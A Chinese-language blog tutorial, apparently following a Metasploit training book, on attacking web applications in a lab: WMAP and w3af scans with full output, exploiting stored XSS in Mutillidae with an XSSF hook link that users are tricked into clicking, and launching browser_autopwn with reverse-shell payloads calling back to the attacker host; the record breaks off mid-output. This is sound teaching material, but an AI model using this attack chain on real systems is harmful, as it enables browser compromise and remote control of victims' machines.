f10@t's blog

f10@t's blog

Metasploit渗透测试魔鬼训练营-web应用渗透

Metasploit渗透测试魔鬼训练营-web应用渗透

渗透测试 渗透测试

字数统计: 6.7k阅读时长: 38 min

 2019/02/07   Share

• 
• 
• 
• 
• 

OWASP Top 10 - 2017

1. Injection(注入)
2. Broken Authentication(认证管理缺陷)
3. Sensitive Data Exposure(敏感数据暴露)
4. XML External Entities (XXE)
5. Broken Access Control(失效的访问控制)
6. Security Misconfiguration(安全配置错误)
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization(不安全的反序列化)
9. Using Components with Known Vulnerabilities(使用具有已知漏洞的组件)
10. Insufficient Logging&Monitoring(记录和监控不足)

基于Metasploit渗透测试框架的web应用渗透技术

辅助模块

该模块位于auxiliary下，web应用辅助扫描、漏洞查找都在此处。为了方便可以使用wmap进行扫描。下面对10.10.10.129进行扫描

msf5 > load wmap

.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf5 > wmap_sites
[*] Usage: wmap_sites [options]
	-h        Display this help text
	-a [url]  Add site (vhost,url)
	-d [ids]  Delete sites (separate ids with space)
	-l        List all available sites
	-s [id]   Display site structure (vhost,url|ids) (level) (unicode output true/false)

msf5 > wmap_sites -a 10.10.10.129
[*] Site created.
msf5 > wmap_sites -a 10.10.10.130
[*] Site created.
msf5 > wmap_sites -a 10.10.10.254
[*] Site created.
msf5 > wmap_sites -l
[*] Available sites
===============

     Id  Host          Vhost         Port  Proto  # Pages  # Forms
     --  ----          -----         ----  -----  -------  -------
     0   10.10.10.129  10.10.10.129  80    http   0        0
     1   10.10.10.130  10.10.10.130  80    http   0        0
     2   10.10.10.254  10.10.10.254  80    http   0        0

msf5 > wmap_targets -d 0
[*] Loading 10.10.10.129,http://10.10.10.129:80/.
msf5 > wmap_run
[*] Usage: wmap_run [options]
	-h                        Display this help text
	-t                        Show all enabled modules
	-m [regex]                Launch only modules that name match provided regex.
	-p [regex]                Only test path defined by regex.
	-e [/path/to/profile]     Launch profile modules against all matched targets.
	                          (No profile file runs all enabled modules.)

# 查看哪些模块将会在扫描中使用
msf5 > wmap_run -t
[*] Testing target:
[*] 	Site: 10.10.10.129 (10.10.10.129)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2019-02-07 14:30:31 +0800
[*] Loading wmap modules...
[*] 39 wmap enabled modules loaded.
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[*] Module auxiliary/scanner/http/frontpage_login
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/scraper
[*] Module auxiliary/scanner/http/svn_scanner
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] Module auxiliary/scanner/http/webdav_website_content
[*] 
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Module auxiliary/scanner/http/dir_scanner
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Module auxiliary/scanner/http/files_dir
[*] Module auxiliary/scanner/http/http_put
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Module auxiliary/scanner/http/trace_axd
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*] 
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*] 
=[ Query testing ]=
============================================================
[*] 
=[ General testing ]=
============================================================
[*] Done.

# 查看扫描结果并进行攻击
msf5 > wmap_run -e
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] 	Site: 10.10.10.129 (10.10.10.129)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2019-02-07 14:47:50 +0800
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[+] 10.10.10.129:80 Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Attempting to connect to 10.10.10.129:80
[+] No File(s) found
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[-] 10.10.10.129 does not appear to be vulnerable, will not continue
[*] Module auxiliary/scanner/http/frontpage_login
[*] 10.10.10.129:80       - http://10.10.10.129/ may not support FrontPage Server Extensions
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[+] 10.10.10.129 allows GET,HEAD,POST,OPTIONS,TRACE methods
[+] 10.10.10.129:80 - TRACE method allowed.
[*] Module auxiliary/scanner/http/robots_txt
[*] [10.10.10.129] /robots.txt found
[+] Contents of Robots.txt:
User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/

[*] Module auxiliary/scanner/http/scraper
[+] [10.10.10.129] / [Free CSS template by ChocoTemplates.com]
[*] Module auxiliary/scanner/http/svn_scanner
[*] Using code '404' as not found.
[+] [10.10.10.129:80] SVN Entries file found.
[-] [10.10.10.129] Version 0 not supported
[*] Module auxiliary/scanner/http/trace
[+] 10.10.10.129:80 is vulnerable to Cross-Site Tracing
[-] Auxiliary failed: NoMethodError undefined method `id' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:295:in `report_vuln'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/http/trace.rb:47:in `run_host'
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:111:in `block (2 levels) in run'
[-]   /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'
[*] Module auxiliary/scanner/http/vhost_scanner
[*]  >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.
[*] Module auxiliary/scanner/http/webdav_website_content
[*] 
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Path: /
[*] Using code '404' as not found.
[+] Found http://10.10.10.129:80/js/ 200
[+] Found http://10.10.10.129:80/op/ 200
[+] Found http://10.10.10.129:80/css/ 200
[+] Found http://10.10.10.129:80/doc/ 403
[+] Found http://10.10.10.129:80/ops/ 200
[+] Found http://10.10.10.129:80/tmp/ 200
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Path: /
[*] Module auxiliary/scanner/http/dir_scanner
[*] Path: /
[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.129
[+] Found http://10.10.10.129:80/1111/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/11/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/3/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123321/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1337/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/00001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/0/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/0001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/111/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/04/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/10/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/2/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/007/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1000/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123123/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/4/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/8/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/777/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/6/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/606/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/9/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/7/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/911911/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/666/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/5/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/CHANGELOG/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/LICENSE/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/administrator/ 302 (10.10.10.129)
[+] Found http://10.10.10.129:80/cache/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/cgi-bin/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/components/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/css/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/doc/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/f/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/gallery2/ 302 (10.10.10.129)
[+] Found http://10.10.10.129:80/ghost/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/icons/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/images/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/includes/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/installation/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/javascript/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/js/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/language/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/libraries/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/login/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/logs/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/media/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/modules/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/phpBB2/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/plugins/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/phpmyadmin/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/templates/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/tmp/ 404 (10.10.10.129)
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/files_dir
[*] Path: /
[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://10.10.10.129:80/index.html 200
[+] Found http://10.10.10.129:80/index2.html 200
[+] Found http://10.10.10.129:80/signin.html 200
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[+] Found http://10.10.10.129:80/index.php 302
[+] Found http://10.10.10.129:80/index2.php 302
[+] Found http://10.10.10.129:80/login.php 500
[+] Found http://10.10.10.129:80/signin.php 500
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension 
[+] Found http://10.10.10.129:80/administrator 301
[+] Found http://10.10.10.129:80/cache 301
[+] Found http://10.10.10.129:80/cgi-bin 301
[+] Found http://10.10.10.129:80/contact 200
[+] Found http://10.10.10.129:80/css 301
[+] Found http://10.10.10.129:80/images 301
[+] Found http://10.10.10.129:80/includes 301
[+] Found http://10.10.10.129:80/installation 301
[+] Found http://10.10.10.129:80/index 200
[+] Found http://10.10.10.129:80/index2 302
[+] Found http://10.10.10.129:80/javascript 301
[+] Found http://10.10.10.129:80/js 301
[+] Found http://10.10.10.129:80/login 500
[+] Found http://10.10.10.129:80/libraries 301
[+] Found http://10.10.10.129:80/logs 301
[+] Found http://10.10.10.129:80/modules 301
[+] Found http://10.10.10.129:80/phpmyadmin 301
[+] Found http://10.10.10.129:80/signin 200
[+] Found http://10.10.10.129:80/templates 301
[+] Found http://10.10.10.129:80/tmp 301
[+] Found http://10.10.10.129:80/xmlrpc 301
[*] Using code '404' as not found for files with extension 
[+] Found http://10.10.10.129:80/administrator 301
[+] Found http://10.10.10.129:80/cache 301
[+] Found http://10.10.10.129:80/cgi-bin 301
[+] Found http://10.10.10.129:80/contact 200
[+] Found http://10.10.10.129:80/css 301
[+] Found http://10.10.10.129:80/images 301
[+] Found http://10.10.10.129:80/includes 301
[+] Found http://10.10.10.129:80/index 200
[+] Found http://10.10.10.129:80/installation 301
[+] Found http://10.10.10.129:80/index2 302
[+] Found http://10.10.10.129:80/javascript 301
[+] Found http://10.10.10.129:80/js 301
[+] Found http://10.10.10.129:80/libraries 301
[+] Found http://10.10.10.129:80/login 500
[+] Found http://10.10.10.129:80/logs 301
[+] Found http://10.10.10.129:80/modules 301
[+] Found http://10.10.10.129:80/phpmyadmin 301
[+] Found http://10.10.10.129:80/signin 200
[+] Found http://10.10.10.129:80/templates 301
[+] Found http://10.10.10.129:80/tmp 301
[+] Found http://10.10.10.129:80/xmlrpc 301
[*] Module auxiliary/scanner/http/http_put
[*] Path: /
[-] 10.10.10.129: File doesn't seem to exist. The upload probably failed
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Path: /
[-] 10.10.10.129:80 Folder does not require authentication. [405]
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Path: /
[*] Starting scan with 0ms delay between requests
[*] Server 10.10.10.129:80 returned HTTP 404 for /.  Use a different one.
[*] Module auxiliary/scanner/http/trace_axd
[*] Path: /
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*] 
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*] 
=[ Query testing ]=
============================================================
[*] 
=[ General testing ]=
============================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Launch completed in 778.7549073696136 seconds.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[*] Done.

# 查看结果
msf5 > vulns

Vulnerabilities
===============

Timestamp                Host          Name                       References
---------                ----          ----                       ----------
2019-02-07 06:49:59 UTC  10.10.10.129  HTTP Trace Method Allowed  CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561

渗透模块

metasploit针对各种web应用的渗透模块分散在module的多个文件夹下，如：expolot/unix/webapp、exploit/windows/http、exploit/multi/http等，也有针对主流CMS(Wordpress、Joomla)的漏洞、针对各类数据库的漏洞，同时包含渗透成功后用来操作的web shell(PHP和JSP)。有的模块没有的话，也可以自己编写加载。

除此之外，metasploit也提供了和主流扫描器、渗透测试软件的接口：W3AF、SQLMap、BeEF等。

Web应用漏洞扫描探测

扫描器

这里介绍一款不错的扫描器，w3af（Web Application Attack and Audit Framework）。该工具分为两个部分：核心模块和插件。(ps:这个工具说实话配起来还挺麻烦的。。。这里提供几个有帮助的文章：

• https://blog.csdn.net/f786548139/article/details/80604586
• https://blog.csdn.net/weixin_34744507/article/details/83049215

这个工具也有图形界面和命令行界面，分别是w3af_gui和w3af_console，后者提供了GUI的界面，如图：

下面用该工具在命令行界面下对http://www.dvssc.com/dvwa/index.php进行扫描

w3af>>> plugins 
w3af/plugins>>> audit xss, sqli
w3af/plugins>>> crawl web_spider 
w3af/plugins>>> crawl config web_spider 
w3af/plugins/crawl/config:web_spider>>> 
set help keys back exit print save view 
w3af/plugins/crawl/config:web_spider>>> set 
only_forward follow_regex ignore_regex 
w3af/plugins/crawl/config:web_spider>>> set only_forward true
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.
w3af/plugins>>> output html_file 
w3af/plugins>>> back   
w3af>>> target 
w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php
w3af/config:target>>> back 
The configuration has been saved.
w3af>>> start

扫描结果：

除此之外w3af还提供了各种有用的小工具，如：base64encode, base64decode, gencc(模拟信用卡等信息), mad5hash, sha1hash, urlencode, urldecode。

SQL注入探测

msf中也有SQLMap的接口，具体的使用这里不做详解了。手动也可检测。　　

XSS漏洞探测

XSS主要有三种：储存型XSS、反射型XSS、基于DOM的XSS。实验环境中，在定V主页面下存在一个Mutilliade的博客系统：

使用w3af探测XSS漏洞：

root@attacker:~/Desktop/w3af# ./w3af_console 
w3af>>> plugins 

# xss 模块
w3af/plugins>>> audit xss

# 爬取模块
w3af/plugins>>> crawl web_spider 
w3af/plugins>>> crawl config web_spider 
w3af/plugins/crawl/config:web_spider>>> set only_forward true
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.

# 输出模块
w3af/plugins>>> output html_file 
w3af/plugins>>> output config html_file 
w3af/plugins/output/config:html_file>>> set 
template output_file verbose 
w3af/plugins/output/config:html_file>>> set verbose true
w3af/plugins/output/config:html_file>>> set output_file /root/dvssc_blog.html 
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back

# 设定目标
w3af>>> target 
w3af/config:target>>> 
set help keys back exit print save view 
w3af/config:target>>> set target
target_os target_framework target  
w3af/config:target>>> set target http://www.dvssc.com/mutillidae/index.php
w3af/config:target>>> back
The configuration has been saved.

# 开始扫描
w3af>>> start 
New URL found by web_spider plugin: "http://www.dvssc.com/mutillidae/index.php"
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...user_name=..." which modifies the "user_name" parameter. This vulnerability was found in the request with id 243.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=view-someones-blog.php", using HTTP method POST. The sent post-data was: "show_only_user=&Submit_button=Submit" which modifies the "show_only_user" parameter. This vulnerability was found in the request with id 255.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...password=..." which modifies the "password" parameter. This vulnerability was found in the request with id 271.
Found 1 URLs and 28 different injections points.
The URL list is:
- http://www.dvssc.com/mutillidae/index.php
The list of fuzzable requests is:
- Method: GET | http://www.dvssc.com/mutillidae/index.php
- Method: GET | http://www.dvssc.com/mutillidae/index.php
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (page, php_file_name, submit)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (target_host, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, password_confirm, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (view_user_name, password, Submit_button)
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php", using HTTP method GET. The sent data was: "php_file_name=&page=source-viewer.php&submit=Submit" The modified parameter was "php_file_name". This vulnerability was found in the request with id 384.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=user-info.php", using HTTP method POST. The sent post-data was: "view_user_name=&password=FrAmE30.&Submit_button=Submit" which modifies the "view_user_name" parameter. This vulnerability was found in the request with id 386.
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:552)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:553)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:554)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:555)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:557)
Scan finished in 1 minute 31 seconds
Stopping the core...

输出的html报告：

可以看出，该博客系统中存在储存型的XSS漏洞。

Web应用渗透测试

SQL注入示例

略

XSS跨站攻击实例

既然它(www.dvssc.com)存在一个储存型的XSS，我们加以利用。使用我的攻击机在博客页面申请一个账号，在里面可以写博客：

可以看到，他对我们的输入的特殊字符没有进行任何防护措施，直接导致了XSS。

在内网中的WinXP主机也可以访问这个博客(通过linux Metasploit的路由)：

访问申请的账号的博客，触发XSS，弹出了窗口。　　

使用Metasploit

Metasploit中也有针对XSS的插件，安装教程：https://blog.csdn.net/AcSuccess/article/details/73485583。这个模块也老了，所以有时候不匹配新的msf规则。

打开metasploit，开始测试：

# 加载XSSF模块
msf5 > load xssf
[-] Your Ruby version is 2.5.3. Make sure your version is up-to-date with the last non-vulnerable version before using XSSF!



 ____  ____   ______    ______   ________  
|_  _||_  _|.' ____ \ .' ____ \ |_   __  | 
  \ \  / /  | (___ \_|| (___ \_|  | |_ \_| 
   > `' <    _.____`.  _.____`.   |  _|    
 _/ /'`\ \_ | \____) || \____) | _| |_     
|____||____| \______.' \______.'|_____| Cross-Site Scripting Framework 3.0
                                          Ludovic Courgnaud - CONIX Security


[+] Please use command 'xssf_urls' to see useful XSSF URLs
[*] Successfully loaded plugin: xssf

# xssf中的链接
msf5 > xssf_urls 
[+] XSSF Server 	 : 'http://10.10.10.128:8888/' 		or 'http://<PUBLIC-IP>:8888/'
[+] Generic XSS injection: 'http://10.10.10.128:8888/loop' 	or 'http://<PUBLIC-IP>:8888/loop'
[+] XSSF test page	 : 'http://10.10.10.128:8888/test.html' or 'http://<PUBLIC-IP>:8888/test.html'

[+] XSSF Tunnel Proxy	: 'localhost:8889'
[+] XSSF logs page	: 'http://localhost:8889/gui.html?guipage=main'
[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
[+] XSSF help page	: 'http://localhost:8889/gui.html?guipage=help'

下面我们在这个用户的博客中放入这个链接： 用一定手段欺骗别人点击(比如换一个url)后就会产生效果。内网客户机WinXP点击了这个链接后：

在攻击机xssf的gui中的log中就会出现这个用户的信息：

可以看出，请求是从10.10.10.254发来的，客户机的系统是32位WinXP，使用的是IE浏览器。下面我们使用msf对其进行攻击：

# 客户机详细信息
msf5 auxiliary(server/browser_autopwn) > xssf_information 1

INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS 	: 10.10.10.254
ACTIVE ? 	: TRUE
FIRST REQUEST 	: 2019-02-09 22:07:23
LAST REQUEST 	: 2019-02-09 22:23:53
CONNECTION TIME : 0hr 16min 30sec
BROWSER NAME 	: Internet Explorer
BROWSER VERSION : 6.0
OS NAME		: Windows
OS VERSION 	: XP
ARCHITECTURE 	: ARCH_X86
LOCATION 	: http://10.10.10.128:8888
XSSF COOKIE ?	: YES
RUNNING ATTACK 	: NONE
WAITING ATTACKS : 0


# 配置并使用browser_autopwn模块
msf5 > use auxiliary/server/browser_autopwn
msf5 auxiliary(server/browser_autopwn) > options
Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf5 auxiliary(server/browser_autopwn) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf5 auxiliary(server/browser_autopwn) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf5 auxiliary(server/browser_autopwn) > exploit 
[*] Auxiliary module running as background job 0.

[*] Setup
msf5 auxiliary(server/browser_autopwn) > 
[*] Starting exploit modules on host 10.10.10.128...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/UpcSM
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/NJNtplVtwKv
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/dFOtVUOMPmc
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/oQIYImSFPVkT
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/STMNDtGOTiANY
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/uBrKmGeGJoM
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/PHlayF
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
